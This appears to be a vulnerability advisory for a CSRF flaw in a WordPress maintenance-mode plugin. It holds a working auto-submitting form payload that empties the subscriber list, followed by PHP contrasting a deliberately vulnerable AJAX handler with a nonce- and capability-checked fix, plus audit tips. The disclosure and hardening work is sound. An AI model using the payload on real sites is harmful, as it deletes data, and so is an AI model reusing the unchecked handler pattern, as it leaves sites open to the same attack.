wpexploit | Daniel Ruf | WPEX-ID: 68DEAB46-1C16-46AE-A912-A104958CA4CF
History: Jun 20, 2022 - 12:00 a.m.

WP Maintenance Mode & Coming Soon < 2.4.5 - Subscribed Users Deletion via CSRF


EPSS: 0.001 (Low), Percentile: 26.3%

The plugin lacks CSRF protection on the admin-ajax action that empties the subscribed users list. Because admin-ajax.php authenticates the request with the WordPress login cookie alone, an attacker who lures a logged-in administrator to a page under their control can submit the request on the admin's behalf and delete the whole subscriber list.

<!-- PoC: auto-submitting cross-site form. The browser attaches the victim's
     WordPress cookies, and the vulnerable handler performs no nonce check,
     so loading this page as a logged-in admin empties the subscriber list. -->
<form id="test" action="https://example.com/wp-admin/admin-ajax.php" method="POST">
    <input type="text" name="action" value="wpmm_subscribers_empty_list">
</form>
<script>
    document.getElementById("test").submit();
</script>
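To show what the missing check looks like on the server side, the following PHP is an added illustration written for this page; it is not the plugin's own code. It sketches an admin-ajax handler in the shape the advisory describes (no nonce, no capability check) next to a hardened version. The `wp_ajax_wpmm_subscribers_empty_list` hook name follows from the action value in the PoC above; the option name `wpmm_subscribers_demo`, the function names and the `admin.js` script are assumptions.

```php
<?php
// Added illustration, not the plugin's code. Hook name derived from the PoC's
// action value; option and function names are assumptions for this example.

// VULNERABLE pattern: the handler assumes that reaching admin-ajax.php with an
// admin cookie proves intent. A cross-site form POST carries that cookie too,
// so any page the admin visits can trigger the deletion.
function wpmm_demo_empty_list_vulnerable() {
    delete_option( 'wpmm_subscribers_demo' );
    wp_send_json_success( 'list emptied' );
}
// add_action( 'wp_ajax_wpmm_subscribers_empty_list', 'wpmm_demo_empty_list_vulnerable' );

// HARDENED pattern:
// (1) require a nonce tied to this action; a third-party page cannot read or
//     forge it, so the PoC form above (which sends no 'nonce' field) is rejected;
// (2) check the capability, since every logged-in user (subscriber role
//     included) can reach wp_ajax_* hooks, and a nonce alone is not authz.
function wpmm_demo_empty_list_hardened() {
    // Dies with HTTP 403 and body "-1" when 'nonce' is missing or invalid.
    check_ajax_referer( 'wpmm_subscribers_empty_list', 'nonce' );

    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'insufficient privileges', 403 );
    }

    delete_option( 'wpmm_subscribers_demo' );
    wp_send_json_success( 'list emptied' );
}
add_action( 'wp_ajax_wpmm_subscribers_empty_list', 'wpmm_demo_empty_list_hardened' );

// The legitimate admin page has to supply the nonce. Hand it to the page's
// script so the real AJAX call can POST it as the 'nonce' field.
function wpmm_demo_enqueue_admin_script() {
    wp_enqueue_script( 'wpmm-demo-admin', plugins_url( 'admin.js', __FILE__ ), array( 'jquery' ), '1.0', true );
    wp_localize_script( 'wpmm-demo-admin', 'wpmmDemo', array(
        'ajaxUrl' => admin_url( 'admin-ajax.php' ),
        'nonce'   => wp_create_nonce( 'wpmm_subscribers_empty_list' ),
    ) );
}
add_action( 'admin_enqueue_scripts', 'wpmm_demo_enqueue_admin_script' );
```

Replaying the PoC form against the hardened handler fails at `check_ajax_referer()`, which is the check the advisory reports as absent in versions before 2.4.5. When auditing other plugins for the same class of bug, look for every `add_action( 'wp_ajax_...' )` callback and confirm it calls `check_ajax_referer()` or `wp_verify_nonce()` and a `current_user_can()` test before any state-changing call such as `delete_option()`.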
